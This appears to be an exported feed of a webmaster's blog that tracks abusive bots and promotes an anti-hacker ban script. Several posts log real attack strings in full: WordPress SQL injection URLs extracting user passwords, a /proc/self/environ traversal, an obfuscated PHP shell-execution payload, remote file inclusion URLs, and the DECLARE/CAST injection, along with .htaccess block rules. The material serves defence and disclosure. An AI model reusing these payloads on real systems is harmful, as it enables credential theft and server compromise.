tag:blogger.com,1999:blog-339232182015-02-03T15:25:18.023-06:00Web RobotsWeb robots are visiting sites to hack, spam, email harvest and to scrape your website content for profit.
This blog is an attempt to keep track of them and to help webmasters by listing the abuse in Google.tmasternoreply@blogger.comBlogger193125tag:blogger.com,1999:blog-33923218.post-80085345378631900452012-03-30T16:38:00.000-05:002012-03-30T16:39:21.070-05:00New uploadM&M Autoban v4.8 has been uploaded. This version adds country ban by IP.<div class="blogger-post-footer">Get M&M Autoban to protect your website.</div>tmasternoreply@blogger.com0tag:blogger.com,1999:blog-33923218.post-54961503598503768722011-12-16T10:59:00.005-06:002011-12-16T14:01:31.866-06:00webmasters how to disable google relatedFrom: http://www.lunarlog.com/google-related-privacy/<br />Reposting: I have not been able to find a way to disable Google Related. If you have not seen it, you had better check out what's showing up on your website.<br /><a target='_blank' title='ImageShack - Image And Video Hosting' href='http://imageshack.us/photo/my-images/694/instawaresrelated.gif/'><img src='http://img694.imageshack.us/img694/6661/instawaresrelated.gif' border='0'/></a><br /><br /><br />File a complaint here <a href="https://www.ftccomplaintassistant.gov/">https://www.ftccomplaintassistant.gov/</a><br /><br /><blockquote>Google Related Program and My Privacy Issues<br /><br />I spent the last couple of weeks updating my main website Lunarstudio - mostly reprogramming and adding new images. When updating websites, most responsible webmasters and designers will run their site through additional browsers, operating systems, and test people’s reactions to new content. I had a friend look at my site on Sunday to see if she had any feedback. Out of the corner of my eye, I noticed a full-width bar appear at the bottom of my page on her monitor. 
My first reaction was “WTF”, followed by concern that somehow I must have uploaded malware to the back-end of my site. The third option which was slightly more worrisome is that some hackers got into my site. So I took a closer look, and the bottom left read “Google Related” (don’t install this.)<br /><br />Now, I would never think Google would have released a toolbar that covered up part of the screen. Not only was it distracting from the design I had worked so hard on, but it wouldn’t just affect me but almost every webmaster and designer on the planet. So my next thought was that it had to be some malware she accidentally downloaded over the course of her Internet travels. Upon even closer inspection, I noticed that it was serving up advertisements and contact information from competitors. So someone looking at my site could see another image at the bottom of the screen, then decide to go to that website instead.<br /><br />I started to look into this. Sure enough, it’s part of a new, 20-day old Google program which is a toolbar extension for Internet Explorer and Chrome. ArsTechnica wrote a concise article on what Google Related does here. While it might prove useful for some users, for webmasters and those concerned with privacy, this is an absolute nightmare. It represents a major downfall in Net Neutrality if this is allowed to carry on. *Aside* — some might argue that Google is not a telecom, Internet Provider, or government agency and hence doesn’t fall into the argument of threatening Net Neutrality. However, I should remind people that Google has mentioned that it’s testing their Internet Providing services. Also, Android runs on many cellphones as well as telecom providers. 
They’re basically in bed with one another.<br /><br />There’s several different and valid concerns, not to mention the legality of this program:<br /><br />1. It interferes with a person or company’s intended website design without their permission.<br />2. It potentially distracts an end-user.<br />3. It slows down a person’s website loading time. The speed issue is probably negligible, but it’s still there without an owner’s permission.<br />4. It risks having people leave your website in favor of another. Holding user retention on a landing-page is tough enough, but this just adds fuel to the fire.<br />5. Due to people wandering off one’s website, it can jeopardize website owner’s businesses and livelihoods.<br />6. Google is directly (or indirectly) profiteering from someone else’s work without their permission.<br />7. This is potentially part of their AdWords program, which makes money off of advertisements.<br />8. It allows for Google to monitor your browsing habits, even when not using Google search. It’s basically spying on your activities.<br />9. It potentially opens up the door for further abuse.<br />10. It threatens Google’s competitors (Yahoo!, Bing, and other search engines.) If successful, competitors might also have to roll out similar toolbars or methods.<br />11. It could become a permanent part of Google Chrome.<br />Now, there’s some usefulness to the end-user. It wouldn’t be fair for me to mention the Google Related negatives without the positives:<br /><br />1. Provides directions.<br />2. Provides alternative solutions for someone looking for a service or help.<br />I was almost positive Google would provide webmasters with a method to take this off of owner’s websites through the use of META tags, but my searches for that method turned up empty. 
Instead, I came across other “unapproved” methods of using CSS code to disable the iframe, either by moving the toolbar off-screen, or by hiding the iframe completely. Unfortunately, I tried these methods and it didn’t work. It seems that Google caught on to webmasters changing their CSS code, and in turn updated their own to prevent us from doing so.<br /><br />Since then, I’ve brought it to the attention of some friends on Facebook, however I think my concern has largely fallen on deaf ears which is understandable. I’ve also written on the Google Forum where you can see there my concern is #6. Some might call it an overreaction, but I think I’m fully justified here. The people reporting this problem is so low at the moment because Google Related is just starting to get attention. This is part of the reason why I’m writing about it on my blog — it’s to bring attention to this.<br /><br />My main issue is that Google is intruding upon my work and business without permission. The nail in the coffin is that they are also potentially profiteering without my permission too. I think it’s just a matter of time before Google is:<br /><br />1. Sued by competitors.<br />2. Department of Justice goes after them and tries to break up the monopoly.<br />3. Public outrage from the webmasters community gets out of control.<br />4. Or they disable it before it gets to any of the points listed above.<br />I hope I am overly concerned, and that Google disables their new program almost as soon as it has started. However, it blows my mind how this idea got past scores of lawyers, executives, management, and employees at a billion dollar company in the first place. If you agree with my concerns, please promote this article and also express your concern on the Google Related Forum. 
If you disagree, I’m still interested in hearing your views</blockquote>tmasternoreply@blogger.com0tag:blogger.com,1999:blog-33923218.post-91761771007447170532011-03-11T11:02:00.001-06:002011-03-11T11:05:19.239-06:00"Script Injections" listBots vs Browsers - has a new list of all injection attempts.<br /><br />If you're keeping up with this, you need to look through this list and add the keywords to block to the hackers.txt file.tmasternoreply@blogger.com0tag:blogger.com,1999:blog-33923218.post-24920366775547273332011-03-08T08:58:00.002-06:002011-03-08T09:06:57.359-06:00mass email problemsI have just discovered that the email option of my script can trigger the mass email alarms on the free host. They use this alarm to stop spammers.<br /><br />If you're running the script on a free host, you need to disable the emails until I can build an outbox system that will merge the emails and send them as 1 message once a day.<br /><br />Go into autoban and change all mail commands to <br />//mailtmasternoreply@blogger.com0tag:blogger.com,1999:blog-33923218.post-74218424291775652262011-03-08T08:45:00.001-06:002011-03-08T08:58:23.465-06:00182.114.206.25 hn.kd.ny.adsl union injection hacker20and%205=6%20union%20select%200x5E5B7D7E,0x5E5B7D7E,0x5E5B7D7E,0x5E5B7D7E,0x5E5B7D7E,0x5E5B7D7E,0x5E5B7D7E,0x5E5B7D7E,0x5E5B7D7E,0x5E5B7D7E%20-- <br /><br />from ip 182.114.206.25 hn.kd.ny.adsltmasternoreply@blogger.com1tag:blogger.com,1999:blog-33923218.post-33945924878993550962010-08-26T15:06:00.002-05:002010-08-26T15:10:32.558-05:00as13448.com trafficMozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SU 2.011; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; InfoPath.1) 
<br />All Hits From static-208-80-194-34.as13448.com 208.80.194.34 <br /><br /><br />I am getting a lot of bot traffic from lots of IPs on subdomains of as13448.com<br />The website as13448.com is not an ISP so all of those IPs need to be blocked.tmasternoreply@blogger.com1tag:blogger.com,1999:blog-33923218.post-7073265136802125862010-05-24T09:50:00.003-05:002010-05-24T11:10:54.300-05:00mylife.com privacy violations.Mylife.com is running TV advertisements and getting a lot of traffic, so I checked them out and was shocked to see that when you go to the site and enter your name, approx. age and zip, the system will come back to you and display your XXX (private info)<br /><br />Check it out yourself and once you're upset, help by complaining about this huge privacy violation. They are helping create identity fraud.<br /><br />File a complaint here <a href="https://www.ftccomplaintassistant.gov/">https://www.ftccomplaintassistant.gov/</a><br /><br />And you may also want to go to www.privacyrights.org and report this so they can start tracking this company. <a href="http://www.privacyrights.org/contact">http://www.privacyrights.org/contact</a><br /><br />It is likely that they will not have this information for all states. If they do display private info on you please let us know.<br /><br />Also see <a href="http://www.complaintsboard.com/bycompany/mylifecom-a123026.html">www.complaintsboard.com</a><br /><br />Also see <a href="http://www.consumeraffairs.com/online/mylife.html">http://www.consumeraffairs.com/online/mylife.html</a><br /><br /><br />Also see <a href="http://techpaul.wordpress.com/2009/03/06/just-say-no-to-mylifecom/"> Just say no to Mylife.com</a><br /><br /><blockquote>Better Business Bureau<br />This company practices what the Los Angeles Better Business Bureau calls negative option cancellation. 
In this sales strategy, customers agree to pay for services unless they cancel within a specified period of time. Members are required to cancel prior to the initial anniversary date to avoid continuing annual charges to their credit cards.[6]<br /><br />Complaints from customers not resolved in a satisfactory manner caused the Los Angeles Better Business Bureau to rate Reunion.com 'F'.[7]<br /><br />The BBB was concerned that the company used misleading advertising practices by e-mailing customers advising them that people 'may' be searching for them, and offers them to become paid members to find the identity of any people that may search for them in the future. In its FAQ section, the Reunion.com site describes this feature as follows: "'Who's Searching For You' will reveal the listed names of the specific users who have performed a search using your first and last (current or Maiden) names and your age range within 5 years of your listed date of birth and is still saved in their Search History'.[8]<br /></blockquote><div class="blogger-post-footer">Get M&M Autoban to protect your website.</div>tmasternoreply@blogger.com0tag:blogger.com,1999:blog-33923218.post-36407001611486224182010-02-07T22:08:00.002-06:002010-02-07T22:13:52.375-06:00New York spam on Road RunnerNYC Rentals<br />nestseekers.com/Properties/Rentals/Manhattan<br />manhattanadmin@gmail.com<br />74.68.123.67 Submitted on 2010/02/06 at 7:25pm<br />very nice blog.<br /><br />very nice blog. 
manhattanadmin@gmail.comNYC<br />Rentalshttp://www.nestseekers.com/Properties/Rentals/Manhattanspam<br /><br />1 #<br /> NYC Apartments<br />nestseekers.com/Properties/Rentals/Manhattan<br />manhattanadmin@gmail.com<br />74.68.123.67 Submitted on 2010/02/06 at 5:44pm<br />interesting.<br /><br /><br />1 #<br /> NYC Rentals<br />nestseekers.com/Properties/Rentals/Manhattan<br />manhattanadmin@gmail.com<br />74.68.123.67 Submitted on 2010/02/06 at 5:28pm<br />very nice blog.<br /><br /><br /><br />1 #<br /> Free Image Hosting<br />imagehosting21.com<br />admin@imagehosting21.com<br />74.68.123.67 Submitted on 2010/02/06 at 10:45am<br />good blog keep it up.<br /><br />good blog keep it up. admin@imagehosting21.comFree Image<br />Hostinghttp://www.imagehosting21.comspam<br /><br /><br />1 #<br /> Free Image Hosting<br />imagehosting21.com<br />admin@imagehosting21.com<br />74.68.123.67<br /><br /><br />Sent a complaint to RR admin and got this crap back. Looks like RR does not care about blog spam. I already sent them the time and IP of the abuser. And they ignored that.<br /><br /><br />Hello,<br /><br />Road Runner supports the free flow of information and ideas over the Internet. Road Runner does not <br />actively monitor nor does Road Runner exercise editorial control over the content of any web site, <br />electronic mail transmission, mailing list, news group or other material created or accessible over <br />Road Runner services.<br /> <br /><br />If you feel that a Road Runner subscribers activities constitute harassment and have contact <br />information for them, please write them an email, CCing Abuse@rr.com, requesting that they "cease <br />and desist" contact with you. <br /><br /><br />If you receive further contact from the Road Runner subscriber after that point, or do not have <br />contact information for them: DO NOT REPLY or correspond with that person further. 
Please instead <br />forward all documentation to abuse@rr.com, which should include: full email headers or webserver <br />logs showing posts made on a message board or other Internet forum (these would typically be <br />obtained from the administration of that site). Logs would need to contain the following <br />information, for Road Runner to process them: Date of Incident, Time of Incident, Time Zone, <br />Offender IP, URL of site or offending posts. Road Runner will not accept logs that are not in plain <br />text (ascii) format. Do not attach files to your e-mail. All logs must be included in the body of <br />the message.<br /><br />Thank you for taking the time to contact Road Runner.<br /><br />- Road Runner Abuse [SM]<div class="blogger-post-footer">Get M&M Autoban to protect your website.</div>tmasternoreply@blogger.com1tag:blogger.com,1999:blog-33923218.post-82016807626537760052008-05-26T18:14:00.003-05:002010-02-03T01:42:38.901-06:00Mozilla/5.0 (MrCarlito-0.1 http://www.mrcarlito.com/spider.html)bad-behavior<br /> 403 Required header 'Accept' missing <br />Agent: Mozilla/5.0 (MrCarlito-0.1 http://www.mrcarlito.com/spider.html) <br />64.237.57.194 64-237-57-194.reliableservers.com <br /><br /><blockquote>MrCarlito-0.1 is an experimental spider that collects header & link information from web pages. The spider is written in PERL (Practical Extraction and Report Language), and uses the LWP::UserAgent Class. 
Currently this spider does not delve into websites, it simply obtains the headers & hostnames contained in your web page index.</blockquote><br /><br />Hmm, you had better fix this broken bot if you plan on using it for a real website.<br />You're blocked because you were detected loading webpages, not headers.tmasternoreply@blogger.com3tag:blogger.com,1999:blog-33923218.post-84680107913533248142009-06-24T18:57:00.010-05:002009-07-29T12:35:58.638-05:00IE 8 breaks subdomains making them hard to read using domain highlightingDomain Highlighting in Internet Explorer 8 (IE8) now blanks the subdomain and following text after the domain.<br /><br /><a href='http://img209.imageshack.us/i/ie8c.jpg/'><img src='http://img209.imageshack.us/img209/4404/ie8c.jpg' border='0' alt='Image Hosted by ImageShack.us'/></a><br/><br /><br />This is nuts. It makes this site read blogger.com and you cannot see the subdomain. Whose lame idea is this? It's one thing to make the main domain a different color; it's another to hide the entire URL.<br /><br />Someone has to find a way around this. There must be some way you can highlight the URL bar using java so the subdomain will be visible. Or some way to force IE8 into IE7 mode. We own our subdomains and M$ has no right to blank them out. They are part of our domain names and part of our keyword usage.<br /><br /><br />This has to be fixed.<br /><br />Microsoft is taking away our legal use of subdomains. <br />Websites who use subdomains are not crooks; we are legally using 1 domain to create many websites. 
Just because some crook used a subdomain they should not be hidden.<br /><br /><br />ZDNet says <a href="http://community.zdnet.co.uk/blog/0,1000000567,10008836o-2000331855b,00.htm">IE8 puts dim wits ahead of tech savvy.</a><br /><br /><a href="http://aidanwalsh.net/2008/03/on-ie8-domain-highlighting/">aidanwalsh.net</a> says <blockquote>why do you have to obfuscate the rest of the URL information by default? No part of a URL is irrelevant, and information contained in URLs is becoming more and more relevant as time goes on (logically structured URLs, URL based identity management, etc). Why do I need to hold my mouse over the address bar to be able to see this? Surely there are better ways to emphasise the domain block of the URL? Embolden it. Change the colour of the domain, not the rest of the URL. </blockquote><br /><br /><br />domain highlighting, ie 8 domain name greyed out, ie8 address bar subdomain, ie8 subdomains broken, making the subdomain visible in ie8tmasternoreply@blogger.com2tag:blogger.com,1999:blog-33923218.post-74805438056573978922009-06-30T17:57:00.002-05:002009-06-30T17:58:16.159-05:00wrangler.websitewelcome.com botAgent: -NO AGENT- <br />74.52.200.178 wrangler.websitewelcome.com <br /><br />Just what is this bot? It doesn't have a useragent and the website websitewelcome.com has no info on it, just an email contact address. 
<br /><br />websitewelcome.com added to the block listtmasternoreply@blogger.com2tag:blogger.com,1999:blog-33923218.post-33621116198798108122009-06-30T17:50:00.003-05:002009-06-30T17:55:43.828-05:00useragent spammer www.ongarofrancesco.orgAgent: (a href="http://www.ongarofrancesco.org">Independent Security Researcher(/a> Independent Security Researcher(/a>" target=\_BLANK"> <br />79.45.39.47 host47-39-dynamic.45-79-r.retail.telecomitalia.it <br /><br />This bot tries to spam the useragent logs that some sites post, with links to a website at www.ongarofrancesco.org <br /><br />This looks to be some hacker ref site. The bot is from Italy<br /><br />This just goes to show why you should not have scripts on your site that display the useragents that you have logged to the internet, because they can contain HTML.tmasternoreply@blogger.com0tag:blogger.com,1999:blog-33923218.post-1157650822060323552006-09-07T12:12:00.001-05:002009-03-07T23:20:47.271-06:00security.lightspeedsystems.com abusebad-behavior 400 Required header 'Accept' Missing. <br />Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50215) <br />66.17.15.154 66-17-15-154.security.lightspeedsystems.com <br /><br />Thought to be a scraper. <a href="http://willmacc.wordpress.com/2006/08/31/lightspeed-scraper-or-crawler/">See other info here</a><br /><br />Reports now say that this is content filtering.<br /><a href="http://www.lightspeedsystems.com/Contentfiltering.asp">lightspeedsystems.com </a><br />If it is, it's the worst bot ever written because it fakes its useragent and sends illegal headers. Clearly not the tech leader it says on the website.<br /><br />Writing to lightspeed and waiting for a reply. 
<br /><br />Update:<br />lightspeedsystems.com refuses to reply to my emails so it's banned. I don't care what they say it is. It is abuse because they are faking the useragents and are using improper headers and they do not identify themselves in the scan. <br /><br /><br />added domain ban<br />lightspeedsystems.com,Wont reply to emails abuse<br /><br />Also banned by all blogs using Bad Behavior.tmasternoreply@blogger.com5tag:blogger.com,1999:blog-33923218.post-6313237017208395352009-01-20T13:47:00.003-06:002009-01-20T13:55:03.494-06:00strange code on wp blog detectedmmautoban has detected the following code being used on a WP blog.<br /><br />Anyone know what this is?<br /><br />/functionnumber-%20iterator-%20context%20%7B%20%20%20%20iterator%20=%20iterator?%20iterator.bindcontext%20:%20Prototype.K;%20%20%20%20var%20index%20=%20-number-%20slices%20=%20-%20array%20=%20this.toArray;%20%20%20%20while%20index%20+=%20number%20%20array.length%20%20%20%20%20%20slices.pusharray.sliceindex-%20index+number;%20%20%20%20return%20slices.collectiterator-%20context;%20%20<br /><br />/functionfilter-%20iterator-%20context%20%7B%20%20%20%20iterator%20=%20iterator?%20iterator.bindcontext%20:%20Prototype.K;%20%20%20%20var%20results%20=%20;%20%20%20%20if%20Object.isStringfilter%20%20%20%20%20%20filter%20=%20new%20RegExpfilter;%20%20%20%20this.eachfunctionvalue-%20index%20%20%20%20%20%20%20if%20filter.matchvalue%20%20%20%20%20%20%20%20results.pushiteratorvalue-%20index;%20%20%20%20;%20%20%20%20return%20results;%20%20 <br /><br 
/>/functioniterator-%20context%20%7B%20%20%20%20iterator%20=%20iterator?%20iterator.bindcontext%20:%20Prototype.K;%20%20%20%20var%20result;%20%20%20%20this.eachfunctionvalue-%20index%20%20%20%20%20%20%20value%20=%20iteratorvalue-%20index;%20%20%20%20%20%20if%20result%20==%20undefined%20%20value%20=%20result%20%20%20%20%20%20%20%20result%20=%20value;%20%20%20%20;%20%20%20%20return%20result;%20%20 <br /><br /><br />/functioniterator-%20context%20%7B%20%20%20%20iterator%20=%20iterator?%20iterator.bindcontext%20:%20Prototype.K;%20%20%20%20var%20result;%20%20%20%20this.eachfunctionvalue-%20index%20%20%20%20%20%20%20value%20=%20iteratorvalue-%20index;%20%20%20%20%20%20if%20result%20==%20undefined%20%20value%20%20result%20%20%20%20%20%20%20%20result%20=%20value;%20%20%20%20;%20%20%20%20return%20result;%20%20 GET <br /><br />/functioniterator-%20context%20%7B%20%20%20%20iterator%20=%20iterator?%20iterator.bindcontext%20:%20Prototype.K;%20%20%20%20var%20trues%20=%20-%20falses%20=%20;%20%20%20%20this.eachfunctionvalue-%20index%20%20%20%20%20%20%20iteratorvalue-%20index%20?%20%20%20%20%20%20%20%20trues%20:%20falses.pushvalue;%20%20%20%20;%20%20%20%20return%20trues-%20falses;%20%20<br /><br /><br /><br />/functioniterator-%20context%20%7B%20%20%20%20iterator%20=%20iterator.bindcontext;%20%20%20%20return%20this.mapfunctionvalue-%20index%20%7B%20%20%20%20%20%20return%20%7Bvalue:%20value-%20criteria:%20iteratorvalue-%20index%7D;%20%20%20%20%7D.sortfunctionleft-%20right%20%7B%20%20%20%20%20%20var%20a%20=%20left.criteria-%20b%20=%20right.criteria;%20%20%20%20%20%20return%20a%20%3C%20b?%20-1%20:%20a%20%20b%20?%201%20:%200;%20%20%20%20.pluckvalue;%20%20<br /><br /><br /><br />%20null%20:%20fillWith;%20%20%20%20return%20this.eachSlice(number-%20function%20(slice)%20{while%20(slice.length%20%3C%20number)%20{slice.push(fillWith);}return%20slice;});} <br /><br /><br />It has about 15 other version I suspect it is some type of atack.<br />Unless some plugin is malfunctioning. 
<br />Anyone have any info what this code is?tmasternoreply@blogger.com2tag:blogger.com,1999:blog-33923218.post-9561096340874667682009-01-15T15:40:00.002-06:002009-01-15T15:44:13.321-06:00OSCommerce modsOScommerce Notes<br />===============<br />A rare bug has been detected in OScommerce. If the customer does not select a payment method at checkout, the browser is redirected to <br /><br />/checkout_payment.php?error_message=Please+select+a+payment+method+for+your+order<br /><br />The +select+ in this URL sets off the injection hack detection in mmautoban.<br /> To prevent this, edit your OSCommerce english.php file and change the error statement from <br />Please Select to Please Pick. <br /> This will prevent customers from getting banned.<br />It is unknown if other such errors exist in other places or other programs. <br />If you see any, please report them.tmasternoreply@blogger.com1tag:blogger.com,1999:blog-33923218.post-87021102588391824752008-12-03T23:21:00.004-06:002008-12-03T23:27:30.401-06:00'mozilla/4.0 (k1b compatible; rss 6.0; windows sot 5.1 security kol' wordpress hackerJust detected this hacker. The IP is blocked by no-more-funn.moensted.dk <br /><br />What is this useragent? 
(k1b compatible; rss 6.0; windows sot 5.1 security kol)<br /><br />www._____.com/index.php?cat=%2527+UNION+SELECT+CONCAT(666-CHAR(58)-user_pass-CHAR(58)-666-CHAR(58))+FROM+wp_users+where+id=1/* <br />Agent: mozilla/4.0 (k1b compatible; rss 6.0; windows sot 5.1 security kol) <br />58.241.255.38 <br /><br />www._____.com/index.php?cat=999+UNION+SELECT+null-CONCAT(666-CHAR(58)-user_pass-CHAR(58)-666-CHAR(58))-null-null-null+FROM+wp_users+where+id=1/* <br />Agent: mozilla/4.0 (k1b compatible; rss 6.0; windows sot 5.1 security kol) <br />58.241.255.38 <br /> <br />www._____.com/wp-trackback.php?p=1 <br />Agent: mozilla/4.0 (k1b compatible; rss 6.0; windows sot 5.1 security kol) <br />58.241.255.38 <br /><br />www.____.com/xmlrpc.php<br />Agent: mozilla/4.0 (k1b compatible; rss 6.0; windows sot 5.1 security kol) <br />58.241.255.38tmasternoreply@blogger.com0tag:blogger.com,1999:blog-33923218.post-66414360255684859692008-11-20T18:10:00.004-06:002008-11-20T18:21:12.552-06:00babycaleb.mvhosted.com hacker attacksBaby hacker has moved to http://babycaleb.mvhosted.com<br /><br />And his baby bots are now trying to inject this new URL into websites.<br />The site, when inspected using Spam Spade to avoid any virus infection, shows the exploit is in the HTML just like before.<br /><br />A search shows it has infected many websites. 
<a href="http://www.google.com/search?q=babycaleb.mvhosted.com">http://www.google.com</a><br />Parsing input: http://babycaleb.mvhosted.com<br />Host babycaleb.mvhosted.com (checking ip) = 74.53.187.178<br />host 74.53.187.178 = picsfolio.com.187.53.74.in-addr.arpa (cached)<br />Host babycaleb.mvhosted.com (checking ip) = 74.53.187.178<br />host 74.53.187.178 = picsfolio.com.187.53.74.in-addr.arpa (cached)<br />Routing details for 74.53.187.178<br />[refresh/show] Cached whois for 74.53.187.178 : abuse@theplanet.com<br />Using abuse net on abuse@theplanet.com<br />abuse net theplanet.com = abuse@theplanet.com<br />Using best contacts abuse@theplanet.com<br /><br /><br />Send abuse messages to theplanet.comtmasternoreply@blogger.com0tag:blogger.com,1999:blog-33923218.post-14605393276342445252008-11-08T20:31:00.014-06:002008-11-20T18:17:30.689-06:00babycaleb.fortunecity.co.uk hacker now shut down.I am getting a lot of these requests lately<br /><br />/shop/catalog/product_info.php?cPath=http://babycaleb.fortunecity.co.uk/index.htm <br /><br />They are from lots of IPs, all trying to remote load this page. Inside that page is a hack attempt. AVG gives an alarm if you try to view the source.<br /><br />Do not go to the website <strong>babycaleb.fortunecity.co.uk</strong>. AVG detects a virus but it still gets into your system. Look for ..<br /><strong>c:\windows\system32\tools\regexe.exe</strong> <br />a <strong>trojan horse downloader.generic8.cox </strong> <br /><br />--updated-<br />The site has now been shut down.<br /><br />A search of Google <br /><a href="http://www.google.com/search?q=babycaleb.fortunecity.co.uk">http://www.google.com/search?q=babycaleb.fortunecity.co.uk</a> shows that sites all over the net are infected with this attack and they are allowing the attack to spread. 
Perhaps they are involved in the atack?<div class="blogger-post-footer">Get M&M Autoban to protect your website.</div>tmasternoreply@blogger.com9tag:blogger.com,1999:blog-33923218.post-4292568379839366742008-11-12T14:31:00.002-06:002008-11-12T14:35:45.947-06:00itsapic.com/crawler.html another beta208.43.85.166<br />Required header 'Accept' missing GET / HTTP/1.0<br />User-Agent: Mozilla/5.0 (compatible; itsapic.com_crawler/0.01 +http://itsapic.com/crawler.html; crawler@itsapic.com)<br />Connection: close<br />Referer: http://u.webring.com/hub?ring=xxxxxxxxxxxxxxxx<br /><br /><br />This bot was scanning webing looking for sites and got blocked by BB so watch for it.<br />Website does not tell what its doing or ask permission to enter your site.<br /><br /><br />add to robots<br />User-agent: itsapic.com_crawler<br />Disallow: /<div class="blogger-post-footer">Get M&M Autoban to protect your website.</div>tmasternoreply@blogger.com0tag:blogger.com,1999:blog-33923218.post-1900170436259109532008-09-11T09:54:00.004-05:002008-09-11T10:15:58.740-05:00serverkompetenz.net Hackersserverkompetenz.net is a hacker not a spambot.<br /><br />.com/nuke/index.php?k=/../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ GET HTTP/1.1 <br />Agent: <PRE> $x0e="\145x\x65\x63"; $x0f="\x66eo\146"; $x10="\x66\x72ea\x64"; $x11="\146un\x63\164io\x6e\x5f\x65x\151s\x74\x73"; $x12="i\163\x5f\162\x65s\157ur\x63\x65"; $x13="\152\157\x69\156"; $x14="o\142_g\145t\x5f\x63o\156\164en\x74\x73"; $x15="ob\137\x65\156d\137\x63lea\156"; $x16="\x6fb_st\x61\x72\164"; $x17="\x70\141\163s\164\x68\162\165"; $x18="\x70\143\154ose"; $x19="p\157\160e\x6e"; $x1a="\163h\145\154l\137\x65\170e\143"; $x1b="\x73\x79s\x74e\x6d"; function x0b($x0b){ global $x0e-$x0f-$x10-$x11-$x12-$x13-$x14-$x15-$x16-$x17-$x18-$x19-$x1a-$x1b; $x0c = ''; if (!empty($x0b)) {if($x11('exec')) {@$x0e($x0b-$x0c);$x0c = $x13("\n"-$x0c); }elseif($x11('shell_exec')) {$x0c = @$x1a($x0b); }elseif($x11('system')) 
{@$x16();@$x1b($x0b);$x0c = @$x14();@$x15(); }elseif($x11('passthru')) {@$x16();@$x17($x0b);$x0c = @$x14();@$x15(); }elseif(@$x12($x0d = @$x19($x0b-"\x72"))){ $x0c = ""; while(!@$x0f($x0d)) { $x0c .= @$x10($x0d-1024); } @$x18($x0d);} } return $x0c;}echo x0b("ec\150\157\x20c\1624n\153\137\x72oc\153s");</pre><br /> <br />81.169.152.101 h986442.serverkompetenz.net <br /><br />Bot attempted to include some script in place of its user agent string.<br /><br />It then tried to remote load a script.<br />Blacklist Domain Ban: serverkompetenz.net <br />.com/nuke/index.php?k=http://www.jfc.info/jfcinfo/grafiken/i??? GET HTTP/1.1 <br />Agent: http://cr4nk.ws/ [de] (windows 3.1; i) [crank] <br />81.169.152.101 h986442.serverkompetenz.nettmasternoreply@blogger.com1tag:blogger.com,1999:blog-33923218.post-37662598401198983022008-08-22T22:49:00.000-05:002008-08-23T00:00:55.594-05:00DECLARE%20@S%20CHAR(4000);SET%20@S=CASTThe latest hack running right now is an injection attempt using a string like this.<br /><br />DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C----removed----%20AS%20CHAR(4000));EXEC(@S);<br /><br />This is a bot attack and is coming from everywhere. <br />They come in 2 at a time from the same IP.<br /><br />They are trying to inject some code into your site to display an iframe that will take people to another site. It doesn't look like they are attacking PHP; they are attacking ASP, Cold Fusion and Perl. <a href="http://isc.sans.org/diary.html?storyid=4771">See more here isc.sans.org</a><br /><br />Also see this <a href="http://www.webmasterworld.com/search_engine_spiders/3725038.htm">post </a> which recommends.<br /><br /><br />RewriteCond %{REQUEST_URI} ^(.*)CAST(.*) [OR] <br />RewriteCond %{REQUEST_URI} ^(.*)DECLARE(.*) [NC,OR] <br /><br />But a better page on how to block this by .htaccess is <a href="http://www.0x000000.com/?i=567">located here. 
</a><br /><br /><br />They are also scanning for a delay in page return, so any script that sleeps when it detects a hack must have the sleep removed or they will come back and hit you harder.<br /><br /><br />Just the hits will bring your server down if you try to ban all the IPs being used, so I have modified the hacker modules.<br /><br />Update <a href="http://www.box.net/shared/nk40gde139">hacker modules</a> Here.<br /><br /><br /><br /><br />You will also want to download your databases and scan them for IFRAMES and JavaScript.
tag:blogger.com,1999:blog-33923218.post-3495066244174181570 2008-08-06T09:52:00.003-05:00 2008-08-06T10:00:52.410-05:00
magnum.liquidweb.com hacker
Agent: mozilla/4.0 (compatible; msie 7.0; windows nt 5.1; .net clr 2.0.50727; .net clr 1.1.4322) <br />64.91.248.2 magnum.liquidweb.com <br />string=[ feed=http%3A%2F%2Fchyngachanga.ru%2Fcontent%2Fwuge%2Fowofi%2F ] <br />Hacker hits with this string trying to get my server to run his scripts.<br /><br />Then after getting banned keeps trying with this set of scripts.<br /><br />?feed=http%3A%2F%2Fwww.qubestunes.com%2Ftreytest%2F1%2Fadoyuru%2Fzagu%2F <br />p=http%3A%2F%2Fwww.heaven-house.kz%2Ftemplates_c%2Fomoj%2Femuqir%2F<br /><br />They all are scripts used by hackers to display a test message on your server<br />http://chyngachanga.ru/content/wuge/owofi/<br />http://www.qubestunes.com/treytest/1/adoyuru/zagu/ <br />http://www.heaven-house.kz/templates_c/omoj/emuqir/
tag:blogger.com,1999:blog-33923218.post-8208617383450746277 2008-06-30T23:41:00.002-05:00 2008-07-15T01:32:33.254-05:00
After banning the domain amazonaws.com because they are hosting bots.<br />I get all of this. 
<br /><br />Agent: webclient <br />75.101.206.181 ec2-75-101-206-181.compute-1.amazonaws.com <br />Agent: webclient <br />75.101.206.181 ec2-75-101-206-181.compute-1.amazonaws.com <br />Agent: mozilla/4.0 (compatible; msie 7.0; windows nt 5.1; .net clr 1.1.4322) <br />67.202.31.132 ec2-67-202-31-132.compute-1.amazonaws.com <br />Agent: mozilla/4.0 (compatible; msie 7.0; windows nt 5.1; .net clr 1.1.4322; .net clr 2.0.50727) <br />67.202.31.132 ec2-67-202-31-132.compute-1.amazonaws.com <br />Agent: mozilla/4.0 (compatible; msie 7.0; windows nt 5.1; .net clr 1.1.4322) <br />67.202.57.15 ec2-67-202-57-15.compute-1.amazonaws.com <br />Agent: mozilla/4.0 (compatible; msie 7.0; windows nt 5.1; .net clr 1.1.4322; .net clr 2.0.50727) <br />67.202.57.15 ec2-67-202-57-15.compute-1.amazonaws.com<br /> <br />Agent: mozilla/4.0 (compatible; msie 7.0; windows nt 5.1; .net clr 1.1.4322; .net clr 2.0.50727) <br />67.202.57.15 ec2-67-202-57-15.compute-1.amazonaws.com <br /> <br />Agent: Mozilla/5.0 (compatible; zermelo; +http://www.powerset.com) [email:paul@page-store.com-crawl@powerset.com] <br />72.44.49.121 ec2-72-44-49-121.z-1.compute-1.amazonaws.com<br /> <br />Agent: AideRSS/1.0 (aiderss.com); * subscribers <br />67.202.34.44 ec2-67-202-34-44.compute-1.amazonaws.com<br /><br /><br />-----Update 